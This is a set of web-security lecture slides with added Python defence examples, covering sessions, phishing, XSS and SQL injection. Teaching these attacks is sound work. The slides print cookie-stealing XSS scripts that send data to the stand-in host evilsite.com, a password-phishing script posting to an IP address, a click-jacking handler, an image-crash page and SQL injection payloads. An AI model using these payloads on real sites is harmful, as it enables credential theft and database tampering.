Web Security 08/30/2021

WEB SECURITY

7.1 THE WORLD WIDE WEB

• The WWW is used for banking, shopping, communication, collaborating, and social networking.
• Entire new classes of security and privacy concerns have emerged with it, grouped under the heading of web security.

7.1.1 HTTP AND HTML

• A web site contains pages of text and images interpreted by a web browser.
• A web browser identifies a web site with a uniform resource locator (URL).
• The web browser uses the Domain Name System (DNS) to determine the IP address of the web server.
• The hypertext transfer protocol (HTTP) is used to retrieve the requested web page.
• The client (web browser) makes a TCP connection to a specified port on the web server, by default port 80 for HTTP.

7.1.1 HTTP AND HTML

• HTTP requests begin with a request line, consisting of a method such as GET or POST, the requested path, and the protocol version, followed by request headers.
• HTTP responses deliver the content to the browser along with a response header.
• The response header includes information about the server, such as its type and version number (the Server header).
• Good security practice is to configure the server so that the default response does not disclose this information: a version number tells an attacker exactly which known bugs to try.
• Hypertext markup language (HTML) provides a structural description of a document, which is rendered by the web browser.

7.1.1 HTTP AND HTML

• HTML features
  • Static document description language
  • Supports linking to other pages and embedding images by reference
  • User input is sent to the server via forms
  • No encryption provided
• HTML extensions
  • Additional media content (e.g., PDF, video) supported through plugins
  • Embedding programs in supported languages (e.g., JavaScript, Java) provides dynamic content that interacts with the user, modifies the browser user interface, and can access the client computer environment

HTML FORMS

• POST variables are included in the HTTP request's body (rather than in the URL's query string, as with GET).
• A POST request may have side effects, such as inserting a record in a database or sending an email.
• Browsers therefore prompt the user before resubmitting a POST (e.g., on reload) to ensure the user really wishes to submit the information again.

7.1.2 HTTPS

• HTTPS is HTTP carried over an additional security layer, SSL (today its successor, TLS), which encrypts the connection and authenticates the server to the client; the default port is 443.

7.1.3 DYNAMIC CONTENT

• Dynamic content in a web page can change in response to user interaction or other
conditions such as passage of time.
• A scripting language is a programming language that provides instructions to be executed
inside an application.
• Client-side scripting language is delivered to the browser and executed by the browser.
• Server-side scripting language is executed on the server, hiding the code from the user
and presenting only the output of the code.

JAVASCRIPT

• Supported by every major browser
• Allows declaration and reuse of functions
• Handles events such as clicking a link or hovering the mouse pointer over a portion of a web page

7.1.4 SESSIONS AND COOKIES

• The HTTP protocol is stateless: each request stands alone.
• Cookies are small pieces of information stored on the client computer and associated with a specific server.
  • When you access a specific website, it may store information as a cookie.
  • Every time you revisit that server, the browser re-sends the cookie to it.
  • Effectively used to hold state information across requests, i.e., to implement sessions.
• Cookies can hold any type of information, including sensitive data such as passwords, credit card numbers, or social security numbers; nothing prevents this, which is exactly why it is dangerous (the cookie travels with every request and sits on disk).
• Two kinds: session (non-persistent) cookies, discarded when the browser closes, and persistent cookies, kept until their expiration date.
• Almost every large website uses cookies.

MORE ON COOKIES

• Cookies are stored on your computer and can be controlled by you.
  • However, many sites require that you enable cookies in order to use the site.
  • Their storage on your computer naturally lends itself to exploits (think about how ActiveX could read cookies from disk...).
  • You can (and probably should) clear your cookies on a regular basis.
  • Most browsers also have ways to turn off cookies, exclude certain sites from setting cookies, and accept only certain sites' cookies.
• Cookies expire.
  • The expiration is chosen by the server (the Expires or Max-Age attribute of the cookie); without one, the cookie lasts only until the browser is closed.
  • Servers often set long lifetimes, so cookies will probably stick around for a while.

TAKING CARE OF YOUR COOKIES

• Managing your cookies in Firefox:
  • Remove Cookie / Remove All Cookies
  • Displays information about individual cookies
  • Also shows the names of cookies, which usually give a good idea of what each cookie stores, e.g., amazon.com: session-id

SERVER-SIDE SESSIONS

• A final method of maintaining session information is to devote space on the web server for keeping user information.
• The server issues a session ID, a unique identifier that corresponds to a user's session; the client only holds this ID (typically in a cookie), while the state itself stays on the server.
• Cost: the storage and processing the server needs to keep track of all of its users' sessions.
• Typical use: a shopping cart.

7.2 ATTACKS ON CLIENTS

• Session hijacking
  • Intercept communication between client and server
  • Impersonate whatever measures are being used to maintain the HTTP session (e.g., replay a captured session cookie)

7.2.1 SESSION HIJACKING

• Defenses against session hijacking
  • Protect against packet sniffers: carry the session over HTTPS so the token is encrypted in transit.
  • Servers should encrypt (or at least never expose in the clear) session tokens.
  • Make session IDs difficult to predict: generate them from a cryptographic random number generator, never from a counter or a timestamp.
• Defenses against replay attacks
  • Incorporate random numbers (nonces) in the exchange.
  • Change session tokens frequently, at least on login and on any change of privilege.
  • Associate a session token with the IP address of the client (caveat: this logs out legitimate users whose address changes, e.g., mobile or NAT clients, so many sites only log a mismatch rather than reject it).
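The cookie, server-side session and session-hijacking slides above describe a design rather than showing one. Here is an added illustration (not code from the slides, and not any particular framework's implementation): a minimal server-side session store that keeps the state on the server, issues unpredictable IDs from the OS random generator, expires them, optionally binds them to the client address, rotates them on login, and emits a Set-Cookie header with the HttpOnly, Secure and SameSite attributes. The class, the cookie name SESSIONID and the client IP addresses are constructed for the example.

```python
import secrets
import time
from http.cookies import SimpleCookie


class SessionStore:
    """Keep user state on the server; the client only ever holds an opaque ID."""

    def __init__(self, ttl_seconds=1800):
        self.ttl = ttl_seconds
        self._sessions = {}  # session_id -> {"data", "client_ip", "expires"}

    def create(self, client_ip, data=None):
        # 32 bytes (256 bits) from the OS CSPRNG: an attacker who has seen
        # many IDs still cannot guess the next one, unlike a counter or a
        # timestamp-based ID.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {
            "data": dict(data or {}),
            "client_ip": client_ip,
            "expires": time.time() + self.ttl,
        }
        return sid

    def lookup(self, sid, client_ip):
        """Return the session data, or None if the ID is unknown, expired,
        or presented from a different client address."""
        entry = self._sessions.get(sid)
        if entry is None or entry["expires"] < time.time():
            self._sessions.pop(sid, None)
            return None
        # Binding the token to the client IP blunts replay of a sniffed cookie.
        # Caveat from the slide: users whose address changes get logged out.
        if entry["client_ip"] != client_ip:
            return None
        return entry["data"]

    def rotate(self, sid, client_ip):
        """Issue a fresh ID for the same state (call on login and on privilege
        change): limits how long a stolen token is useful and defeats fixation."""
        data = self.lookup(sid, client_ip)
        if data is None:
            return None
        del self._sessions[sid]
        return self.create(client_ip, data)


def session_cookie_header(sid, max_age):
    """Set-Cookie value: HttpOnly keeps document.cookie (XSS) from reading it,
    Secure keeps it off plaintext HTTP (sniffers), SameSite=Lax keeps it from
    being attached to most cross-site requests, Max-Age bounds its lifetime."""
    c = SimpleCookie()
    c["SESSIONID"] = sid
    c["SESSIONID"]["httponly"] = True
    c["SESSIONID"]["secure"] = True
    c["SESSIONID"]["samesite"] = "Lax"
    c["SESSIONID"]["path"] = "/"
    c["SESSIONID"]["max-age"] = max_age
    return c["SESSIONID"].OutputString()


if __name__ == "__main__":
    store = SessionStore(ttl_seconds=60)
    sid = store.create("203.0.113.5", {"cart": ["book"]})  # constructed client IP
    print(session_cookie_header(sid, 60))
    print(store.lookup(sid, "203.0.113.5"))   # the cart, same client
    print(store.lookup(sid, "198.51.100.9"))  # None: token replayed from elsewhere
    new_sid = store.rotate(sid, "203.0.113.5")
    print(store.lookup(sid, "203.0.113.5"))   # None: the old token is dead
    print(store.lookup(new_sid, "203.0.113.5"))
```

The store keeps only the session ID on the client, so the "cookies can hold passwords" problem from the slide does not arise: the cookie is a random handle with no meaning off the server. Whether to enforce the IP binding or merely log mismatches is a deployment decision; the code enforces it to make the replay case visible.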

7.2.2 PHISHING

• Forged web pages created to fraudulently acquire sensitive information
• The user is typically solicited to visit the phishing page by a spam email
• Most targeted sites
  • Financial services (e.g., Citibank)
  • Payment services (e.g., PayPal)
  • Auctions (e.g., eBay)
• ~650K unique phishing sites detected monthly in 2020
• Methods used to avoid detection
  • Misspelled URL
  • URL obfuscation
  • Removed or forged address bar

PHISHING EXAMPLE

[Screenshot of a phishing page; source: http://www.anti-phishing.com]

URL OBFUSCATION

• Properties of the page in the previous slide
  • The actual URL differs from the spoofed URL displayed in the address bar
• URL escape character attack
  • Old versions of Internet Explorer did not display anything past an Esc or null character in the URL
  • Displayed vs. actual site:
    http://trusted.com%01%…@<attacker's host>
    Everything before the "@" is user information, not the host name, so the browser connects to the host after the "@" while the old address bar showed only "http://trusted.com"
• Unicode attack
  • Domain names with Unicode (non-ASCII) characters can be registered
  • Some characters have identical, or very similar, graphic rendering, e.g., Cyrillic and Latin "a"
  • Phishing attack on paypal.com
  • Current versions of browsers display Punycode, an ASCII-encoded version of Unicode, for such names: www.xn--pypal-4ve.com
Source: http://www.anti-phishing.com
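Both obfuscation tricks on this slide can be checked mechanically. The following is an added example, not code from the slides: it recovers the host a URL really points to (the part after "@"), converts a displayed host name to the Punycode the browser resolves, and flags labels that mix scripts or that fold to a protected brand once lookalike Cyrillic letters are mapped to their Latin twins. The confusables table is a small assumed subset of the Unicode confusables data, the brand list and the host attacker.example are constructed for the example.

```python
import unicodedata
from urllib.parse import urlsplit

# Assumed subset of the Unicode confusables table: Cyrillic letters whose glyphs
# coincide with Latin ones. Real tooling uses the full confusables.txt data.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",
}
# Constructed list of names worth protecting; a deployment would use its own.
PROTECTED_BRANDS = {"paypal.com", "ebay.com", "citibank.com"}


def actual_host(url):
    """The host the browser really connects to. Anything before an '@' in the
    authority is user information, which is what the escape-character trick
    hides behind: the displayed 'trusted.com' is not the host."""
    return urlsplit(url).hostname


def to_punycode(host):
    """What goes to DNS: each non-ASCII label is encoded as an xn-- label."""
    return host.encode("idna").decode("ascii")


def skeleton(host):
    """Fold lookalike characters to their Latin twins so that visually
    identical names compare equal."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in host.lower())


def script_of(ch):
    """Coarse script classification from the character's Unicode name
    (first word of the name: LATIN, CYRILLIC, GREEK, ...)."""
    if ch.isascii():
        return "LATIN" if ch.isalpha() else "COMMON"
    name = unicodedata.name(ch, "")
    return name.split(" ")[0] if name else "UNKNOWN"


def analyze_host(displayed):
    """Summarize why (or whether) a host name as shown to the user is a lookalike."""
    lowered = displayed.lower()
    actual = to_punycode(lowered)
    scripts = {script_of(ch) for ch in lowered if ch != "."} - {"COMMON"}
    folded = skeleton(lowered)
    return {
        "displayed": displayed,
        "actual": actual,
        "is_idn": any(lbl.startswith("xn--") for lbl in actual.split(".")),
        "mixed_script": len(scripts) > 1,
        "impersonates": folded if folded in PROTECTED_BRANDS and folded != lowered else None,
    }


if __name__ == "__main__":
    for host in ("paypal.com", "p\u0430ypal.com"):  # the second has a Cyrillic a
        print(analyze_host(host))
    # Constructed URL in the shape of the slide's escape-character attack.
    print(actual_host("http://trusted.com%01%00@attacker.example/login"))
```

The Punycode of the Cyrillic-a "paypal" comes out as the xn--pypal-4ve label quoted on the slide, which is why modern address bars show that form instead of the rendered Unicode. Mixed-script detection catches this family of lookalikes; a single-script whole-script confusable (an entirely Cyrillic name that renders like a Latin one) needs the skeleton comparison as well.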

7.2.3 CLICK-JACKING

• A user's mouse click on a page is used in a way that was not intended by the user.
• Click-jacking attack:
    <a onMouseUp="window.open('http://www.evilsite.com')" href="http://www.trustedsite.com/">Trust me!</a>
• Creates a link which appears to point to www.trustedsite.com (that is what the status bar shows for the href).
• But the event handler calls the JavaScript function window.open, which sends the user to the alternate site www.evilsite.com as soon as the mouse button is released.

7.2.3 CLICK-JACKING

• Other JavaScript event handlers, such as onMouseOver, can trigger an action whenever a user simply moves the mouse over that element.
• Most online advertisers pay the sites that host their advertisements based on the number of click-throughs.
• Forcing users to unwillingly click on advertisements raises the fraudulent site's revenue; this is known as click fraud.

7.2.4 IE IMAGE CRASH

• Browser implementation bugs can lead to denial-of-service attacks.
• The classic image crash in Internet Explorer is a perfect example.
• By creating a simple image of extremely large proportions, one could crash Internet Explorer and sometimes freeze a Windows machine:
    <HTML>
    <BODY>
    <IMG SRC="./imagecrash.jpg" width="9999999" height="9999999">
    </BODY>
    </HTML>
• Variations of the image crash attack were still possible on the latest IE version at the time of these slides.

MOBILE CODE

• What is mobile code?
  • Executable program
  • Sent via a computer network
  • Executed at the destination
• Examples
  • JavaScript
  • ActiveX
  • Java plugins
  • Integrated Java Virtual Machines

JAVASCRIPT

• Scripting language interpreted by the browser
• Code enclosed within <script> … </script> tags
• Defining functions:
    <script type="text/javascript">
    function hello() { alert("Hello world!"); }
    </script>
• Event handlers embedded in HTML:
    <img src="picture.gif" onMouseOver="hello()">
• Built-in functions can change the content of the window:
    window.open("http://brown.edu")

ACTIVEX VS. JAVA

ACTIVEX CONTROL
• Windows-only technology; runs in Internet Explorer
• Binary code executed on behalf of the browser
• Can access user files
• Support for signed code
• An installed control can be run by any site (up to IE7)
• IE configuration options: allow, deny, prompt; administrator approval

JAVA APPLET
• Platform-independent via browser plugin
• Java code running within the browser
• Sandboxed execution
• Support for signed code
• An applet runs only on the site where it is embedded
• Applets deemed trusted by the user can escape the sandbox

AUTHENTICODE IN ACTIVEX

• A signed ActiveX control asks the user for permission to run.
• If approved, the control runs with the same privileges as the user.
• The "Always trust content from …" checkbox automatically accepts all future controls by the same publisher.
  • Probably a bad idea.

[Screenshot of the Authenticode prompt; source: Malicious Mobile Code, by R. Grimes, O'Reilly Books]

TRUSTED/UNTRUSTED ACTIVEX CONTROLS

• Trusted publishers
  • The list is stored in the Windows registry.
  • A malicious ActiveX control that is already running can modify the registry to make its publisher trusted.
  • All future controls by that publisher then run without prompting the user.
• Unsigned controls
  • The prompt states that the control is unsigned and gives an accept/reject option.
  • Even if you reject the control, it has already been downloaded to a temporary folder, where it remains.
  • It is not executed if rejected, but it is not removed either.

7.2.6 CROSS-SITE SCRIPTING (XSS)

• The attacker injects scripting code into pages generated by a web application, so that it runs in other users' browsers with that site's origin.
• The injected script can be malicious code: JavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash.
• Threats: phishing, session hijacking, changing of user settings, cookie theft/poisoning, false advertising, execution of code on the client, ...

XSS (CROSS SITE SCRIPTING): AN EXAMPLE

Common type of XSS (stored XSS): injecting malicious code that the site later serves to others

• www.victim.com runs a guestbook application that takes comments from visitors and displays them.
• Input is not sanitized or encoded before it is placed in the page.
• An attacker injects a script that will be executed by subsequent visitors.
• E.g., instead of entering a name, the attacker enters:
    <script language="Javascript">
    var password = prompt('Your session has expired. Please enter your password to continue.', '');
    location.href = "https://10.1.1.1/pass.cgi?passwd=" + password;
    </script>

COOKIE STEALING XSS ATTACKS

• Attack 1
    <script>
    document.location = "http://www.evilsite.com/steal.php?cookie=" + document.cookie;
    </script>
  Redirects the visitor to the attacker's site and concatenates the user's cookies to the URL as a GET parameter for the steal.php page.
• Attack 2
    <script>
    img = new Image();
    img.src = "http://www.evilsite.com/steal.php?cookie=" + document.cookie;
    </script>
  The victim's browser makes a request to this URL to fetch the "image", passing the cookie to the attacker without displaying anything; the victim stays on the page.

XSS PREVENTIONS

• Sanitize inputs so that scripts are not accepted, and, more importantly, encode output at the point where user data is placed into HTML.
• HttpOnly cookies
  • Cookies that can only be used in HTTP requests
  • Not accessible to JavaScript via document.cookie, so the cookie-stealing scripts above get nothing (the script can still make requests that carry the cookie)
(Source: Wikipedia)
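The guestbook from the XSS slides, rendered three ways, as an added example that is not part of the slides: the vulnerable version pastes the comment into HTML, a blocklist "sanitizer" that only strips <script> elements (a common wrong answer, included to show why input filtering alone is not enough), and output encoding with html.escape. The comments, the event-handler payload and the looks_executable() check are constructed for the example; the check is a rough pattern match, not an HTML parser.

```python
import html
import re

# Constructed guestbook entries. The third is the cookie-stealing payload from
# the slides; the fourth carries no <script> tag at all, only an event handler.
COMMENTS = [
    "Nice site!",
    "Hello from <b>Bob</b>",
    '<script>img = new Image(); img.src = '
    '"http://www.evilsite.com/steal.php?cookie=" + document.cookie;</script>',
    '<img src=x onerror="new Image().src='
    '\'http://www.evilsite.com/steal.php?cookie=\'+document.cookie">',
]

# Executable markup in rendered output: a <script> tag, or a tag carrying an
# on... event attribute. Escaped text never matches because its '<' is '&lt;'.
_EXECUTABLE = re.compile(r"<script\b|<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def render_vulnerable(comments):
    """The guestbook from the slide: user text pasted straight into the HTML."""
    return "<ul>" + "".join("<li>%s</li>" % c for c in comments) + "</ul>"


def strip_script_tags(text):
    """Blocklist sanitizer: removes <script> elements and nothing else."""
    return re.sub(r"<script\b.*?</script>", "", text, flags=re.IGNORECASE | re.DOTALL)


def render_blocklisted(comments):
    """Input filtering only. Still executable: the onerror payload survives."""
    return render_vulnerable(strip_script_tags(c) for c in comments)


def render_safe(comments):
    """Output encoding: html.escape turns < > & ' " into entities where the
    text enters HTML, so the browser displays the payload instead of running it."""
    return "<ul>" + "".join(
        "<li>%s</li>" % html.escape(c, quote=True) for c in comments
    ) + "</ul>"


def looks_executable(page):
    """True if the rendered page contains a script tag or an event-handler attribute."""
    return _EXECUTABLE.search(page) is not None


if __name__ == "__main__":
    print("vulnerable :", looks_executable(render_vulnerable(COMMENTS)))
    print("blocklisted:", looks_executable(render_blocklisted(COMMENTS)))
    print("encoded    :", looks_executable(render_safe(COMMENTS)))
    print(render_safe(COMMENTS))
```

Output encoding is context-specific: html.escape is right for text between tags and for quoted attribute values, but data placed inside a script block, a URL or a CSS value needs the encoder for that context. Pair it with HttpOnly cookies so that even a missed sink cannot read the session cookie through document.cookie.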

CLIENT-SIDE XSS DEFENSES

• Proxy-based:
  • Analyze HTTP traffic between browser and web server
  • Look for special HTML characters
  • Encode them before the page is executed in the user's web browser (e.g., NoScript, a Firefox plugin)
• Application-level firewall:
  • Analyze HTML pages for hyperlinks that might lead to leakage of sensitive information
  • Stop bad requests using a set of connection rules
• Auditing system:
  • Monitor execution of JavaScript code and compare the operations against high-level policies to detect malicious behavior

7.3.2 SERVER-SIDE SCRIPT INCLUSION VULNERABILITIES

• Read about server-side script inclusion vulnerabilities.

SQL INJECTION

• Allows an attacker to read, or even modify, arbitrary information in a database by inserting his own SQL commands into the application's queries.
• The injected SQL is passed to the database by the web server as part of a query it builds from user input.
• The root cause is a lack of input validation on the server's part, or more precisely, mixing untrusted input into the SQL text instead of passing it as a parameter.

LOGIN AUTHENTICATION QUERY

• Standard query to authenticate users:
    select * from users where user='$usern' AND pwd='$password'
• Classic SQL injection attack
  • Server-side code sets variables $username and $passwd from the user's input to the web form.
  • The variables are pasted into the SQL query text:
    select * from users where user='$username' AND pwd='$passwd'
  • The attacker enters the special string  M' OR '1=1  as both user name and password, producing:
    select * from users where user='M' OR '1=1' AND pwd='M' OR '1=1'
  • Why? The quote in the input closes the string literal, so the rest is parsed as SQL. AND binds tighter than OR, so the condition reads (user='M') OR ('1=1' AND pwd='M') OR ('1=1'); the last OR is true for every row.
• Result: access obtained without a password (typically as the first user in the table).

PREVENTING SQL INJECTION

• Most languages have built-in functions that escape the dangerous characters in input.
• PHP provided the function mysql_real_escape_string to escape special characters (including single and double quotes) so that the resulting string is safe inside a quoted literal. (The mysql_* extension was removed in PHP 7; its replacements, mysqli and PDO, offer prepared statements, which are the preferred fix.)
• For example, all "malicious" characters are changed by the escape function:
    escape("t ' c") gives "t \' c"
• Applied to the login query
    select user,pwd from users where user='$usern'
  with
    $usern = escape("M' ;drop table user;")
  the result is the safe query
    select user,pwd from users where user='M\' ;drop table user;'
  in which the attacker's text is just an odd user name.
• Escaping only protects quoted string contexts; a value pasted into a numeric context (where id=$id) is still injectable. Parameterized queries (prepared statements) separate the SQL text from the data and avoid the problem altogether.
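The login query from the two slides above, run against an in-memory SQLite database, as an added example that is not code from the slides: the query built by string interpolation, the same query with the slide's escaping idea (in standard SQL form, doubling the quote), a lookup by numeric id that escaping does not protect, and the parameterized version. The users table, its rows and the credentials are constructed; real systems store salted password hashes, not plaintext.

```python
import sqlite3


def make_db():
    """Constructed users table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "correct horse"), (2, "bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, usern, password):
    """The slide's query built by interpolation: the input is parsed as SQL."""
    query = "SELECT user FROM users WHERE user='%s' AND pwd='%s'" % (usern, password)
    return [row[0] for row in conn.execute(query)]


def escape(text):
    """The slide's escaping idea in standard SQL form: a quote inside a string
    literal is written as two quotes (MySQL's escaper uses a backslash)."""
    return text.replace("'", "''")


def login_escaped(conn, usern, password):
    """Escaping works while the input lands inside a quoted string literal."""
    query = "SELECT user FROM users WHERE user='%s' AND pwd='%s'" % (
        escape(usern), escape(password))
    return [row[0] for row in conn.execute(query)]


def lookup_by_id_escaped(conn, user_id):
    """Numeric context: nothing to escape, so '1 OR 1=1' goes through unchanged.
    This is the case the escaping approach does not cover."""
    query = "SELECT user FROM users WHERE id=%s" % escape(user_id)
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, usern, password):
    """Parameterized query: SQL text and values travel separately, so a quote,
    a comment marker or a keyword in the input is only ever data."""
    cur = conn.execute("SELECT user FROM users WHERE user=? AND pwd=?", (usern, password))
    return [row[0] for row in cur]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "M' OR '1=1", "M' OR '1=1"))  # both users, no password needed
    print(login_vulnerable(db, "alice'--", "anything"))      # ['alice']: '--' comments out the pwd check
    print(login_escaped(db, "M' OR '1=1", "M' OR '1=1"))     # []
    print(lookup_by_id_escaped(db, "1 OR 1=1"))              # both users: escaping did not help
    print(login_safe(db, "M' OR '1=1", "M' OR '1=1"))        # []
    print(login_safe(db, "alice", "correct horse"))          # ['alice']
```

SQLite evaluates the string '1=1' as true in a WHERE clause because it converts text to a number by its leading digits, which is why the slide's payload works here as well as on MySQL. The id lookup is the point of the example: escaping is a property of one syntactic context, whereas the parameterized query is safe whatever the surrounding SQL looks like.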
